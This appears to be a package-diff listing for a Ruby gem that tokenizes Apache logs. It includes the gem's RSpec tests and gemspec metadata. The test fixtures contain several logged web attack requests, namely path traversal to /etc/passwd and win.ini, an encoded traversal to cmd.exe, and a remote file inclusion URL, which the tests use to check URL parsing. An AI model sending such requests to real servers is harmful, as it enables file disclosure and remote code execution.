danielsdeleo-teeth 0.0.2

Sign up to get free protection for your applications and to get access to all the features.
data/lib/teeth.rb ADDED
@@ -0,0 +1 @@
1
+ require "teeth/tokenize_apache_logs"
data/spec/spec.opts ADDED
@@ -0,0 +1 @@
1
+ -c
@@ -0,0 +1,10 @@
1
+ require 'teeth/tokenize_apache_logs'
2
+
3
+ def be_greater_than(expected)
4
+ simple_matcher("be greater than #{expected.to_s}") do |given, matcher|
5
+ matcher.failure_message = "expected #{given.to_s} to be greater than #{expected.to_s}"
6
+ matcher.negative_failure_message = "expected #{given.to_s} to not be greater than #{expected.to_s}"
7
+ given > expected
8
+ end
9
+
10
+ end
@@ -0,0 +1,106 @@
1
+ require File.dirname(__FILE__) + '/../spec_helper'
2
+ $INCLUDE_SLOW_TESTS = true
3
+
4
+ describe "Apache Lexer Extension", "when lexing apache errors" do
5
+
6
+ before(:each) do
7
+ str = "[Sun Nov 30 14:23:45 2008] [error] [client 10.0.1.197] Invalid URI in request GET .\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini HTTP/1.1"
8
+ @tokens = str.tokenize_apache_logs
9
+ end
10
+
11
+ it "should return an uuid and empty message for an empty string" do
12
+ tokens = "".tokenize_apache_logs
13
+ tokens[:message].should == ""
14
+ tokens[:id].should match(/[0-9A-F]{32}/)
15
+ end
16
+
17
+ it "should extract an IP address" do
18
+ @tokens[:ipv4_addr].first.should == "10.0.1.197"
19
+ end
20
+
21
+ it "should extract an apache datetime" do
22
+ @tokens[:apache_err_datetime].first.should == "Sun Nov 30 14:23:45 2008"
23
+ end
24
+
25
+ it "should extract the error level" do
26
+ @tokens[:error_level].first.should == "error"
27
+ end
28
+
29
+ it "should extract the URI" do
30
+ @tokens[:relative_url].first.should == ".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\/winnt/win.ini"
31
+ end
32
+
33
+ it "should error out if the string is longer than 1M chars" do
34
+ str = ((("abcDE" * 2) * 1000) * 100) + "X"
35
+ lambda {str.tokenize_apache_logs[:word]}.should raise_error(ArgumentError, "string too long for tokenize_apache_logs! max length is 1,000,000 chars")
36
+ end
37
+
38
+ end
39
+
40
+ describe "Apache Lexer Extension", "when lexing apache access logs" do
41
+ before(:each) do
42
+ str = %q{couchdb.localdomain:80 172.16.115.1 - - [13/Dec/2008:19:26:11 -0500] "GET /favicon.ico HTTP/1.1" 404 241 "http://172.16.115.130/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"}
43
+ @tokens = str.tokenize_apache_logs
44
+ str2 = %q{127.162.219.29 - - [14/Jan/2009:15:32:32 -0500] "GET /reports//ee_commerce/paypalcart.php?toroot=http://www.shenlishi.com//skin/fxid1.txt?? HTTP/1.1" 404 5636}
45
+ @tokens2 = str2.tokenize_apache_logs
46
+ str3 = %q{127.81.248.53 - - [14/Jan/2009:11:49:43 -0500] "GET /reports/REPORT7_1ART02.pdf HTTP/1.1" 206 255404}
47
+ @tokens3 = str3.tokenize_apache_logs
48
+ str4 = %q{127.140.136.56 - - [23/Jan/2009:12:59:24 -0500] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 5607}
49
+ @tokens4 = str4.tokenize_apache_logs
50
+ str5 = %q{127.254.43.205 - - [26/Jan/2009:08:32:08 -0500] "GET /reports/REPORT9_3.pdf//admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5673}
51
+ @tokens5 = str5.tokenize_apache_logs
52
+ str6 = %q{127.218.234.82 - - [26/Jan/2009:08:32:19 -0500] "GET /reports/REPORT9_3.pdf//admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5721}
53
+ @tokens6 = str6.tokenize_apache_logs
54
+ str_naked_url = %q{127.218.234.82 - - [26/Jan/2009:08:32:19 -0500] "GET / HTTP/1.1" 404 5721}
55
+ @tokens_naked_url = str_naked_url.tokenize_apache_logs
56
+ end
57
+
58
+ it "provides hints for testing" do
59
+ #puts "\n" + @tokens.inspect + "\n"
60
+ end
61
+
62
+ it "should extract the vhost name" do
63
+ @tokens[:host].first.should == "couchdb.localdomain:80"
64
+ end
65
+
66
+ it "should extract the datetime" do
67
+ @tokens[:apache_access_datetime].first.should == "13/Dec/2008:19:26:11 -0500"
68
+ end
69
+
70
+ it "should extract the HTTP response code" do
71
+ @tokens[:http_response].first.should == "404"
72
+ #(100|101|20[0-6]|30[0-5]|307|40[0-9]|41[0-7]|50[0-5])
73
+ codes = ['100', '101'] + (200 .. 206).map { |n| n.to_s } +
74
+ (300 .. 305).map { |n| n.to_s } + ['307'] + (400 .. 417).map { |n| n.to_s } +
75
+ (500 .. 505).map { |n| n.to_s }
76
+ codes.each do |code|
77
+ code.tokenize_apache_logs[:http_response].first.should == code
78
+ end
79
+ end
80
+
81
+ it "should extract the HTTP version" do
82
+ @tokens[:http_version].first.should == "HTTP/1.1"
83
+ end
84
+
85
+ it "should extract the browser string with quotes removed" do
86
+ @tokens[:browser_string].first.should == "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
87
+ end
88
+
89
+ it "should not extract an HTTP code when a HTTP response code number appears in the bytes transferred" do
90
+ #puts "\nTOKENS3:\n" + @tokens3.inspect
91
+ @tokens3[:http_response].include?("404").should_not be_true
92
+ end
93
+
94
+ it "should correctly identify gnarly URLs from web attacks as URLs" do
95
+ #puts "\nTOKENS2:\n" + @tokens2.inspect
96
+ @tokens2[:relative_url].first.should == "/reports//ee_commerce/paypalcart.php?toroot=http://www.shenlishi.com//skin/fxid1.txt??"
97
+ @tokens4[:relative_url].first.should == "/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
98
+ @tokens5[:relative_url].first.should == "/reports/REPORT9_3.pdf//admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00"
99
+ @tokens6[:relative_url].first.should == "/reports/REPORT9_3.pdf//admin/includes/header.php?bypass_installed=1&bypass_restrict=1&row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00"
100
+ end
101
+
102
+ it "should correctly extract ``/'' as a URL" do
103
+ @tokens_naked_url[:relative_url].should == ["/"]
104
+ end
105
+
106
+ end
metadata ADDED
@@ -0,0 +1,67 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: danielsdeleo-teeth
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.2
5
+ platform: ruby
6
+ authors:
7
+ - Daniel DeLeo
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+
12
+ date: 2009-03-21 00:00:00 -07:00
13
+ default_executable:
14
+ dependencies: []
15
+
16
+ description: Fast log file parsing in Ruby
17
+ email: ddeleo@basecommander.net
18
+ executables: []
19
+
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files:
23
+ - README.rdoc
24
+ files:
25
+ - README.rdoc
26
+ - Rakefile
27
+ - ext/extconf.rb
28
+ - ext/tokenize_apache_logs.yy
29
+ - ext/tokenize_apache_logs.yy.c
30
+ - lib/teeth.rb
31
+ - spec/fixtures/access.log
32
+ - spec/fixtures/big-access.log
33
+ - spec/fixtures/big-error.log
34
+ - spec/fixtures/error.log
35
+ - spec/fixtures/med-error.log
36
+ - spec/spec.opts
37
+ - spec/spec_helper.rb
38
+ - spec/unit/tokenize_apache_spec.rb
39
+ has_rdoc: true
40
+ homepage: http://github.com/danielsdeleo/teeth
41
+ post_install_message:
42
+ rdoc_options:
43
+ - --inline-source
44
+ - --charset=UTF-8
45
+ require_paths:
46
+ - - lib
47
+ required_ruby_version: !ruby/object:Gem::Requirement
48
+ requirements:
49
+ - - <=
50
+ - !ruby/object:Gem::Version
51
+ version: 1.9.0
52
+ version:
53
+ required_rubygems_version: !ruby/object:Gem::Requirement
54
+ requirements:
55
+ - - ">="
56
+ - !ruby/object:Gem::Version
57
+ version: "0"
58
+ version:
59
+ requirements: []
60
+
61
+ rubyforge_project: bloomfilter
62
+ rubygems_version: 1.2.0
63
+ signing_key:
64
+ specification_version: 2
65
+ summary: Fast log file parsing in Ruby
66
+ test_files: []
67
+